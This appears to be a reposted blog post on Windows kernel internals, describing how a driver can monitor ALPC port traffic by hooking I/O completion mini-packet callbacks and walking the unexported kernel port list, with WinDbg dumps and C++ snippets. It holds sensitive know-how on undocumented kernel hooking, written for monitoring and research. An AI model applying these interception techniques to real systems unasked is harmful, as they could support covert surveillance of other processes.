Connection Port Info | osd.exe (0aac) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | unsecapp.exe (0b48) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | WmiPrvSE.exe (0bd8) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | wmpnetwk.exe (0bd4) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | svchost.exe (0c6c) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | chrome.exe (0ce8) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | Far.exe (0d08) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | conhost.exe (0d10) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | chrome.exe (0d7c) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | chrome.exe (0e10) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | HScrollFun.exe (0f98) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | SetSpeed.exe (0fa4) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | netsession_win (0fcc) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | flux.exe (0fd4) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | AdobeARM.exe (083c) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | netsession_win (0c5c) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | sppsvc.exe (11f8) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | svchost.exe (1290) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | chrome.exe (0a14) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | taskhost.exe (11c4) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | devenv.exe (0494) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | chrome.exe (0134) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | TrustedInstall (0cd0) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | dllhost.exe (0cdc) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | chrome.exe (14e8) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | mscorsvw.exe (1760) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | mscorsvw.exe (17d4) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | notepad.exe (1668) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | Far.exe (11b4) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | conhost.exe (0238) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | SearchIndexer. (16cc) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | windbg.exe (008c) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | wuauclt.exe (085c) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | notepad.exe (1624) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | audiodg.exe (03c4) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | vmmon64.exe (1434) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | VirtualBox.exe (0b1c) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | VBoxSVC.exe (0b60) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | VirtualBox.exe (029c) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | windbg.exe (0fc0) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | vcpkgsrv.exe (13e4) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | AcroRd32.exe (0a94) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | AcroRd32.exe (125c) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | chrome.exe (0864) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | chrome.exe (1414) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | chrome.exe (1604) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | chrome.exe (11a0) <- csrss.exe (01c8) -> everyone like ALPC. And especially applications with network communication, because as was said at training, even gethostbyname ends up by calling some ALPC! So I think it is really good point to start at some object responsible for communication +0x000 TypeList : _LIST_ENTRY [ 0xffffe001`170b9e00 - 0xffffe001`170b9e00 ] +0x010 Name : _UNICODE_STRING "ALPC Port" +0x020 DefaultObject : 0x00000000`000000e1 Void +0x028 Index : 0x26 '&' +0x02c TotalNumberOfObjects : 0x3bc +0x030 TotalNumberOfHandles : 0x3ae +0x034 HighWaterNumberOfObjects : 0x4d1 +0x038 HighWaterNumberOfHandles : 0x4c0 +0x040 TypeInfo : _OBJECT_TYPE_INITIALIZER +0x0b8 TypeLock : _EX_PUSH_LOCK +0x0c0 Key : 0x43504c41 +0x0c8 CallbackList : _LIST_ENTRY [ 0xffffe001`170b9ec8 - 0xffffe001`170b9ec8 ] nd because nt!_ALPC_PORT is of nt!_OBJECT_TYPE it give us opportunity to attach to it by ObFiltering, and it seems it is really possible : But same time filtering objects come with some limitations! Operations OB_OPERATION_HANDLE_CREATE – A new process handle or thread handle was or will be opened. OB_OPERATION_HANDLE_DUPLICATE – A process handle or thread handle was or will be duplicated. Thats basically means, that we are theoretically able to get called at two mentioned HANDLE operations. Thats good, but wants to get more .. after some digging of nt!_ALPC_PORT it is possible to spot nice structure : nt!_ALPC_PORT +0x030 CompletionPacketLookaside : +0x038 Entry : [1] +0x000 ListEntry : _SINGLE_LIST_ENTRY +0x008 Packet : 0xffffe001`18a85150 _IO_MINI_COMPLETION_PACKET_USER +0x010 Lookaside : 0xffffe001`18ca16c0 _ALPC_COMPLETION_PACKET_LOOKASIDE lkd> dt 0xffffe001`18a85150 _IO_MINI_COMPLETION_PACKET_USER ntdll!_IO_MINI_COMPLETION_PACKET_USER +0x000 ListEntry : _LIST_ENTRY [ 0x00000000`00000000 - 0xffffe001`182c0658 ] +0x010 PacketType : 0x5c0004 +0x018 KeyContext : 0x000000f8`3daa8b20 Void +0x020 ApcContext : (null) +0x028 IoStatus : 0n0 +0x030 IoStatusInformation : 0 +0x038 MiniPacketCallback : 0xfffff801`75c6b61c void nt!AlpcpLookasidePacketCallbackRoutine+0 +0x040 Context : 0xffffe001`18ca16f8 Void +0x048 Allocated : 0x1 '' So lets take a look at some subset of nt function responsible for playing with alpc : lkd> x nt!nt*alpc*port fffff801`760b1e34 nt!NtAlpcCreatePort (<no parameter info>) fffff801`76059204 nt!NtAlpcAcceptConnectPort (<no parameter info>) fffff801`76055ab4 nt!NtAlpcDisconnectPort (<no parameter info>) fffff801`7602e3c0 nt!NtAlpcSendWaitReceivePort (<no parameter info>) fffff801`76074de8 nt!NtAlpcConnectPort (<no parameter info>) fffff801`75fe9030 nt!NtAlpcImpersonateClientOfPort (<no parameter info>) lkd> x nt!alpc*port fffff801`76056330 nt!AlpcpClosePort (<no parameter info>) fffff801`76093dc8 nt!AlpcpDispatchReplyToPort (<no parameter info>) fffff801`75feacd0 nt!AlpcpReferenceConnectedPort (<no parameter info>) fffff801`7605672c nt!AlpcpFlushMessagesPort (<no parameter info>) fffff801`75cebf3c nt!AlpcpQueueIoCompletionPort (<no parameter info>) fffff801`7605a140 nt!AlpcpInitializePort (<no parameter info>) fffff801`760592c8 nt!AlpcpAcceptConnectPort (<no parameter info>) fffff801`75f98d7c nt!AlpcpReferenceMessageByWaitingThreadPort (<no parameter info>) fffff801`760565c4 nt!AlpcpFlushResourcesPort (<no parameter info>) fffff801`76057f0c nt!AlpcpEnumerateResourcesPort (<no parameter info>) fffff801`7605a2f4 nt!AlpcpCreateClientPort (<no parameter info>) fffff801`760b1e98 nt!AlpcpCreateConnectionPort (<no parameter info>) fffff801`760a83f4 nt!AlpcpOpenPort (<no parameter info>) fffff801`76056bc4 nt!AlpcpDisconnectPort (<no parameter info>) fffff801`7605a888 nt!AlpcpSetOwnerProcessPort (<no parameter info>) fffff801`76055fe8 nt!AlpcpDestroyPort (<no parameter info>) fffff801`760756d8 nt!AlpcpConnectPort (<no parameter info>) fffff801`7606d144 nt!AlpcpAssociateIoCompletionPort (<no parameter info>) fffff801`76209900 nt!AlpcpLogClosePort (<no parameter info>) fffff801`76055d58 nt!AlpcpDeletePort (<no parameter info>) fffff801`7602c8e0 nt!AlpcpReceiveMessagePort (<no parameter info>) One good candidate to deeper look is NtAlpcSetInformation which call AlpcpInitializeCompletionList and it ends by calling IoAllocateMiniCompletionPacket - and this last routine can sound pretty familiar now! OK, but whats happening there ? It is another callback mechanism – *CompletionIo*, already described in Windows internals 6th edition, Part2 (I/O Completion Ports). And this callback mechanism is setup-ed by default as you have already seen to call nt!AlpcpLookasidePacketCallbackRoutine. It is obvious that it is possible to intercept mechanism by rewriting this callback, but this is not what we want to do … When we look at this default function, we can see how this callback mechanism work. nt!IoSetIoCompletionEx2 ends in nt!IoSetIoCompletionEx, and nt!AlpcpDeferredFreeCompletionPacketLookaside ends by calling nt!IoFreeMiniCompletionPacket per packet in queue. init : nt!IoAllocateMiniCompletionPacket registering : nt!IoSetIoCompletionEx free : nt!IoFreeMiniCompletionPacket NTKERNELAPI void NTAPI IoSetIoCompletionEx( __inout void* completitionPort, __in const void* keyContext, __in const void* apcContext, __in ULONG_PTR ioStatus, __in ULONG_PTR ioStatusInformation, __in bool allocPacketInfo, __in const void* ioMiniCoompletitionPacketUser ); and now how to setup own Callback packet : std::unique_ptr<void, decltype(&IoFreeMiniCompletionPacket)> m_pPacket( IoAllocateMiniCompletionPacket(MiniPacketCallbackInterceptor, this), IoFreeMiniCompletionPacket); ... bool StartIntercepting( __in _ALPC_PORT* alpcPort, __in void* keyContext ) { ... IoSetIoCompletionEx( alpcPort->CompletionPort, keyContext, nullptr, NULL, NULL, FALSE, m_pPacket); ... So now almost done, but one essential thing is missing – alpc port itself to attach .. and there exist some approaches how to find it : [h=3]!alpc /lpp[/h] kdexts.dll do it somehow, so here is the approach : … unfortunately nt!AlpcpPortList is not exported symbol, but its location is inside this ‘structure’ : one member of this structure which can be found quite easly is nt!AlpcPortObjectType, which is not directly exported, but fortunately for us nt!LpcPortObjectType is alias to it! And there is also another way to get it (not so comfortable) – querying it : auto obj_dir = RTL_CONSTANT_STRING(L"\\ObjectTypes");OBJECT_ATTRIBUTES objAttributes; InitializeObjectAttributes( &objAttributes, &obj_dir, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, nullptr); HANDLE h_dir; NTSTATUS status = ZwOpenDirectoryObject(&h_dir, DIRECTORY_QUERY, &objAttributes); if (!NT_SUCCESS(status)) return nullptr; OBJECT_DIRECTORY* object_dir; NTSTATUS status = ObReferenceObjectByHandle(h_dir, 0, 0, KernelMode, &object_dir, nullptr); if (!NT_SUCCESS(status)) return nullptr; for (size_t i = 0; i < _countof(object_dir->HashBuckets); i++) { for (OBJECT_DIRECTORY_ENTRY* dir_entry = object_dir->HashBuckets; dir_entry; dir_entry = dir_entry->ChainLink) { DbgPrint("\nObject : %ws", dir_entry->Object->Name.Buffer); if (!RtlCompareUnicodeString(&dir_entry->Object->Name, &objectName, TRUE)) return &dir_entry->Object; } } to successfully locate this structure, and port list itself, inside of ntoskrnl image just add additional checks of predicable values of some members of structure alongside with equality of value for nt!AlpcPortObjectType [h=3]ObFiltering[/h] Another option *should* be an official option, but in reallity … Ob Filters, and registering on nt!AlpcPortObjectType, mechanism is ready to use and it is already implemented in kernel! But you have some obstacles : nt!AlpcPortObjectType vs ObjectTypes Object : TmTm Object : Desktop Object : Process Object : DebugObject Object : TpWorkerFactory Object : Adapter Object : Token Object : EventPair Object : PcwObject Object : WmiGuid Object : EtwRegistration Object : Session Object : Timer Object : Mutant Object : IoCompletion Object : WindowStation Object : Profile Object : File Object : Semaphore Object : EtwConsumer a lot of object to query for, what are the object types of theirs ? kd> x nt!*objecttype fffff800`02871780 nt!TmResourceManagerObjectType = <no type information> fffff800`028fd5e0 nt!IoDeviceHandlerObjectType = <no type information> fffff800`028fc3a0 nt!ExMutantObjectType = <no type information> fffff800`028fc3a8 nt!ExTimerObjectType = <no type information> fffff800`028737e8 nt!ObpTypeObjectType = <no type information> fffff800`028737e0 nt!ObpDirectoryObjectType = <no type information> fffff800`028fc180 nt!IoDriverObjectType = <no type information> fffff800`028683e8 nt!ExpWorkerFactoryObjectType = <no type information> fffff800`028fc1d8 nt!IoCompletionObjectType = <no type information> fffff800`02867430 nt!EtwpRegistrationObjectType = <no type information> fffff800`028795f0 nt!MmSessionObjectType = <no type information> fffff800`028bd8a0 nt!LpcWaitablePortObjectType = <no type information> fffff800`02870450 nt!WmipGuidObjectType = <no type information> fffff800`028fc110 nt!MmSectionObjectType = <no type information> fffff800`028fc298 nt!ExEventPairObjectType = <no type information> fffff800`02a40ba0 nt!SepSetAuditInfoForObjectType (<no parameter info>) fffff800`028bd8a8 nt!LpcPortObjectType = <no type information> fffff800`02b91050 nt!CmKeyObjectType = <no type information> fffff800`028717a0 nt!TmTransactionObjectType = <no type information> fffff800`028fc6c8 nt!IoControllerObjectType = <no type information> fffff800`028682f8 nt!ExProfileObjectType = <no type information> fffff800`028fc0a0 nt!ExEventObjectType = <no type information> fffff800`028fc838 nt!IoAdapterObjectType = <no type information> fffff800`02868258 nt!ExpKeyedEventObjectType = <no type information> fffff800`02b91070 nt!SeTokenObjectType = <no type information> fffff800`02868760 nt!ExWindowStationObjectType = <no type information> fffff800`028fc398 nt!ExSemaphoreObjectType = <no type information> fffff800`0297bb54 nt!ObGetObjectType (<no parameter info>) fffff800`028fc048 nt!IoFileObjectType = <no type information> fffff800`028717a8 nt!TmEnlistmentObjectType = <no type information> fffff800`02867568 nt!EtwpRealTimeConnectionObjectType = <no type information> fffff800`028b9858 nt!AlpcPortObjectType = <no type information> fffff800`02871778 nt!TmTransactionManagerObjectType = <no type information> fffff800`026edb30 nt!SeComputeAutoInheritByObjectType (<no parameter info>) fffff800`02853f40 nt!DbgkDebugObjectType = <no type information> fffff800`028fc540 nt!IoDeviceObjectType = <no type information> fffff800`02ad55d0 nt!ObCreateObjectType (<no parameter info>) fffff800`028737d8 nt!ObpSymbolicLinkObjectType = <no type information> fffff800`02864e10 nt!PopPowerRequestObjectType = <no type information> fffff800`02868910 nt!ExCallbackObjectType = <no type information> fffff800`02868758 nt!ExDesktopObjectType = <no type information> and how many are officialy supported and exported for kernel dev ? extern POBJECT_TYPE *CmKeyObjectType; extern POBJECT_TYPE *IoFileObjectType; extern POBJECT_TYPE *ExEventObjectType; extern POBJECT_TYPE *ExSemaphoreObjectType; extern POBJECT_TYPE *TmTransactionManagerObjectType; extern POBJECT_TYPE *TmResourceManagerObjectType; extern POBJECT_TYPE *TmEnlistmentObjectType; extern POBJECT_TYPE *TmTransactionObjectType; extern POBJECT_TYPE *PsProcessType; extern POBJECT_TYPE *PsThreadType; extern POBJECT_TYPE *SeTokenObjectType; nt!AlpcPortObjectType is not between exported ones .. but still no such big deal, we can query it by object dir, as we already did in first approach. nt!_OBJECT_TYPE vs “ALPC Port” lkd> dt nt!_OBJECT_TYPE poi(nt!AlpcPortObjectType) -b +0x000 TypeList : _LIST_ENTRY [ 0xffffe001`170b9e00 - 0xffffe001`170b9e00 ] +0x000 Flink : 0xffffe001`170b9e00 +0x008 Blink : 0xffffe001`170b9e00 +0x010 Name : _UNICODE_STRING "ALPC Port" +0x000 Length : 0x12 +0x002 MaximumLength : 0x14 +0x008 Buffer : 0xffffc000`2c287190 "ALPC Port" +0x020 DefaultObject : 0x00000000`000000e1 +0x028 Index : 0x26 '&' +0x02c TotalNumberOfObjects : 0x3c4 +0x030 TotalNumberOfHandles : 0x3b7 +0x034 HighWaterNumberOfObjects : 0x4d1 +0x038 HighWaterNumberOfHandles : 0x4c0 +0x040 TypeInfo : _OBJECT_TYPE_INITIALIZER +0x000 Length : 0x78 +0x002 ObjectTypeFlags : 0x10 '' +0x002 CaseInsensitive : 0y0 +0x002 UnnamedObjectsOnly : 0y0 +0x002 UseDefaultObject : 0y0 +0x002 SecurityRequired : 0y0 +0x002 MaintainHandleCount : 0y1 +0x002 MaintainTypeList : 0y0 +0x002 SupportsObjectCallbacks : 0y0 +0x002 CacheAligned : 0y0 +0x004 ObjectTypeCode : 0 +0x008 InvalidAttributes : 0x80 +0x00c GenericMapping : _GENERIC_MAPPING +0x000 GenericRead : 0x20001 +0x004 GenericWrite : 0x10001 +0x008 GenericExecute : 0 +0x00c GenericAll : 0x1f0001 +0x01c ValidAccessMask : 0x1f0001 +0x020 RetainAccess : 0 +0x024 PoolType : 200 ( NonPagedPoolNx ) +0x028 DefaultPagedPoolCharge : 0 +0x02c DefaultNonPagedPoolCharge : 0x248 +0x030 DumpProcedure : (null) +0x038 OpenProcedure : 0xfffff801`760a83f4 +0x040 CloseProcedure : 0xfffff801`76056330 +0x048 DeleteProcedure : 0xfffff801`76055d58 +0x050 ParseProcedure : (null) +0x058 SecurityProcedure : 0xfffff801`75fe0e44 +0x060 QueryNameProcedure : (null) +0x068 OkayToCloseProcedure : (null) +0x070 WaitObjectFlagMask : 0 +0x074 WaitObjectFlagOffset : 0 +0x076 WaitObjectPointerOffset : 0 +0x0b8 TypeLock : _EX_PUSH_LOCK +0x000 Locked : 0y0 +0x000 Waiting : 0y0 +0x000 Waking : 0y0 +0x000 MultipleShared : 0y0 +0x000 Shared : 0y000000000000000000000000000000000000000000000000000000000000 (0) +0x000 Value : 0 +0x000 Ptr : (null) +0x0c0 Key : 0x43504c41 +0x0c8 CallbackList : _LIST_ENTRY [ 0xffffe001`170b9ec8 - 0xffffe001`170b9ec8 ] +0x000 Flink : 0xffffe001`170b9ec8 +0x008 Blink : 0xffffe001`170b9ec8 ehmm, callbacks disabled, but still we can patch it (as others up to win7 already did) PatchGuard from win8.1 no you can not patch it anymore! How To Ok, so no Ob filtering on “ALPC Port” is NOT allowed, yet! But still you know for what you looking for, so you can do it anyway, by walking trough list in appropriate moments and using first method void CAlpcMonitor::CreateImageNotify( __in_opt UNICODE_STRING* fullImageName, __in HANDLE processId, __in IMAGE_INFO* imageInfo ) { if (!imageInfo) return; auto proc = CProcessMonitor::GetInstance().ProcContainer().ObtainRef(processId); if (!proc.get()) return; if (!proc->IsNetworkProcess) return; CAutoLock<EX_PUSH_LOCK, CSharedLockWorker> lock(&CNt::GetInstance().AlpcInfo()->AlpcpPortListLock); for (auto port = CNt::GetInstance().AlpcInfo()->AlpcpPortList; port != CNt::GetInstance().AlpcInfo()->AlpcpPortListTail; port = CONTAINING_RECORD(port->PortListEntry.Flink, _ALPC_PORT, PortListEntry)) { if (!port->OwnerProcess) continue; if (processId != PsGetProcessId(port->OwnerProcess)) continue; InstallHook(port); } } And you can be even more specific while monitoring, because that communication with svchost, or other generic service, is not information bomb at all, but you can look at it through service names, which can be useful far more! service : PlugPlay service : Power service : DcomLaunch service : RpcEptMapper service : RpcSs service : eventlog service : AudioEndpointBuilder service : MMCSS service : AudioSrv service : CscService service : gpsvc service : ProfSvc service : Themes service : EventSystem service : SENS service : UxSms service : SamSs service : lmhosts service : nsi service : Dhcp service : Dnscache service : ShellHWDetection service : Schedule service : Spooler service : BFE service : MpsSvc service : LanmanWorkstation service : CryptSvc service : DPS service : FDResPub service : NlaSvc service : PcaSvc service : SysMain service : TrkWks service : Winmgmt service : iphlpsvc service : LanmanServer service : netprofm service : WdiServiceHost service : WPDBusEnum service : WdiSystemHost service : WinHttpAutoProxySvc service : Browser service : WSearch service : Netman service : WMPNetworkSvc service : fdPHost service : HomeGroupProvider service : SSDPSRV service : BITS Article about resolving service name by its id (SubProcessTag) you can find here, and also is written more concrete example of implementation here, and even more you can find it in process hacker as well. This method was designed for user mode, but in kernel you are by creation, so lets say it is more straighforward to resolve this information btw. in your IoCompletition alpc callback, your minipacket contains KeyContext which looks like : enum KeyContextMembers { TppAlpcpExecuteCallback = 0, //ntdll AlpcPortType = 2, TppAlpcpCleanupGroupMemberVFuncs = 3, //ntdll LrpcIoComplete = 12, //rpcrt4 LrpcServerIoHandlerPtr = 13, //rpcrt4 SubProcessTag = 15, //TEB }; Conclusions : Seems that IoCompletion callbacks can be really helpful mechanism. It works just on ports that use the I/O completion port type, not on all ALPC ports, but for network monitoring purposes seems it is fair enough Another limitation is that ‘limited’ usage of Ob Filters on AlpcPorts. It is quite nice feature but limited so much … I hope filtering will support at least nt!AlpcPortObjectType soon! At the end of this post, I would like to thank to Alex Ionescu for reviewing this article, and for that nice syscan win-internals training! Sursa: ALPC monitoring | @ZER0mem
×
×
  • Create New...